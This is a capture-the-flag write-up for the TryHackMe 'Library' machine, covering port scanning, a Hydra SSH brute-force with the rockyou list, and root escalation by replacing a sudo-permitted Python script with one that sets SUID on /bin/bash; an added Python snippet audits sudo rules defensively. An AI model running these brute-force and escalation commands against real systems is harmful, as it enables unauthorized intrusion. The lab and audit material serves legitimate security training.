
Tryhackme - Library Writeup


Platform: TryHackMe
Difficulty: Easy
OS: Linux

Reconnaissance

Nmap

nmap -sC -sV -A MACHINE_IP -oA nmap

Open ports:

  • 22/tcp — OpenSSH 7.2p2 (Ubuntu)
  • 80/tcp — Apache 2.4.18, title: Welcome to Blog - Library Machine

Web Enumeration

Visiting port 80 revealed a blog page. The blog post was authored by meliodas — a valid username. The comments section also leaked root and www-data as system usernames.

robots.txt contained an unusual entry:

User-agent: rockyou
Disallow: /

This is a hint to use the rockyou.txt wordlist for brute-forcing.

Directory brute-forcing with feroxbuster and dirsearch found nothing beyond static assets (/images/, master.css, logo.png) — no web application attack surface.


Initial Access

SSH Brute-Force with Hydra

Using the discovered username and the rockyou wordlist hint:

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://MACHINE_IP -t 4

Result:

[22][ssh] host: MACHINE_IP   login: meliodas   password: iloveyou1

SSH Login

ssh meliodas@MACHINE_IP
meliodas@ubuntu:~$ ls
bak.py  user.txt
meliodas@ubuntu:~$ cat user.txt
THM{REDACTED}

Privilege Escalation

Sudo Enumeration

sudo -l
User meliodas may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py

Any Python binary can run /home/meliodas/bak.py as root without a password.

Inspecting bak.py

cat bak.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()

The file is owned by root (-rw-r--r-- 1 root root), so meliodas cannot modify its contents in place. However, deleting a file requires write permission on the containing directory, not on the file itself, and /home/meliodas is owned by meliodas. The file can therefore be removed and recreated with arbitrary contents, and the sudo rule will still match its path.

Exploitation

Delete the original file and replace it with a malicious one:

rm /home/meliodas/bak.py

cat > /home/meliodas/bak.py << 'EOF'
import os
os.system("chmod +s /bin/bash")
EOF

Run it with sudo:

sudo /usr/bin/python3 /home/meliodas/bak.py

This sets the SUID bit on /bin/bash. Spawn a privileged shell:

/bin/bash -p
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
THM{REDACTED}

Summary

Library is a straightforward boot2root machine. The initial foothold relies on OSINT from the web page (username enumeration) combined with a clever robots.txt hint pointing to rockyou. The privilege escalation abuses an overly permissive sudo rule — python* matches any Python binary, and the target script lives in a user-controlled directory, allowing it to be replaced entirely.
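A defender's audit of the sudo rule above, added here as an example and not part of the original writeup: it parses a `sudo -l` command entry and checks, against constructed stat metadata (the uid/gid/mode values and the hardened path /usr/local/sbin/bak.py are assumptions), whether the command path contains a wildcard and whether the script or its parent directory is writable by the rule's user. It generalises the two conditions that made bak.py replaceable on this machine.

```python
import os
import re
import stat
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Constructed stat metadata mirroring the layout in the writeup (not read from a
# real filesystem): path -> (uid, gid, st_mode). uid 1000 for meliodas is assumed.
SAMPLE_FS: Dict[str, Tuple[int, int, int]] = {
    "/home/meliodas": (1000, 1000, 0o40755),        # user-owned home directory
    "/home/meliodas/bak.py": (0, 0, 0o100644),      # root-owned script, as on the box
    "/usr/local/sbin": (0, 0, 0o40755),             # hypothetical hardened location
    "/usr/local/sbin/bak.py": (0, 0, 0o100644),
}

@dataclass
class Finding:
    rule: str
    issues: List[str]

def writable_by(path: str, uid: int, gids: Set[int], fs: Dict[str, Tuple[int, int, int]]) -> bool:
    """Classic Unix DAC check from the mode bits: may this uid/gid set write `path`?"""
    owner, group, mode = fs[path]
    if uid == 0:
        return True
    if uid == owner:
        return bool(mode & stat.S_IWUSR)
    if group in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

def audit_rule(rule: str, uid: int, gids: Set[int], fs: Dict[str, Tuple[int, int, int]]) -> Finding:
    """Flag a `sudo -l` entry whose command uses a glob or whose script can be swapped."""
    cmdline = re.sub(r"^\s*\([^)]*\)\s*", "", rule)      # drop the (runas) spec
    cmdline = re.sub(r"^(?:[A-Z]+:\s*)+", "", cmdline)   # drop NOPASSWD:/SETENV: tags
    binary, *args = cmdline.split()
    issues: List[str] = []
    if any(ch in binary for ch in "*?["):
        issues.append(f"wildcard in command path {binary}: any matching binary is permitted")
    for arg in args:
        if arg not in fs:
            continue                                      # not a path we have metadata for
        if writable_by(arg, uid, gids, fs):
            issues.append(f"{arg} is writable by the invoking user")
        parent = os.path.dirname(arg)
        if parent in fs and writable_by(parent, uid, gids, fs):
            issues.append(f"parent directory {parent} is writable: {arg} can be deleted and recreated")
    return Finding(rule, issues)

if __name__ == "__main__":
    for r in ("(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py",
              "(ALL) /usr/bin/python3 /usr/local/sbin/bak.py"):
        print(audit_rule(r, 1000, {1000}, SAMPLE_FS))
```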


Key Vulnerabilities

#  Vulnerability                                                     Impact
1  Username disclosed in webpage source                              User enumeration
2  robots.txt hints at rockyou wordlist                              SSH brute-force vector
3  Weak SSH password (iloveyou1)                                     Initial access as meliodas
4  sudo allows any Python binary on bak.py in a user-writable dir    Privilege escalation to root

Attack Chain

HTTP enumeration (port 80)
        │
        ▼
Username: meliodas (blog post author)
robots.txt User-agent: rockyou (wordlist hint)
        │
        ▼
Hydra SSH brute-force → meliodas:iloveyou1
        │
        ▼
SSH login → user.txt
        │
        ▼
sudo -l: /usr/bin/python* /home/meliodas/bak.py (NOPASSWD)
bak.py owned by root but home dir writable → rm + recreate
        │
        ▼
Malicious bak.py: chmod +s /bin/bash
sudo python3 bak.py → /bin/bash -p → root shell

Tools Used

Tool                      Purpose
Nmap                      Port scanning and service enumeration
dirsearch / feroxbuster   Web directory brute-forcing
Hydra                     SSH password brute-force
curl                      Manual HTTP inspection
bash                      SUID bash privilege escalation